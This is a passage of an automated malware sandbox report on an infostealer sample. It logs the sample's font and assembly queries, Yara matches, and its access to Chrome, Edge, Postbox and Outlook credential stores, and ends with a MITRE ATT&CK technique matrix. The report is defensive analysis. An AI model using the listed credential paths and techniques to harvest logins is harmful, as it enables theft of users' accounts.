          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match, File source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.4166196575.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.4166196575.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTR
          Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTR
          Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTR
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

          Remote Access Functionality

          Source: Yara match, File source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.4166196575.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.4166196575.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTR
          Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTR
          Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTR
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | 13 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement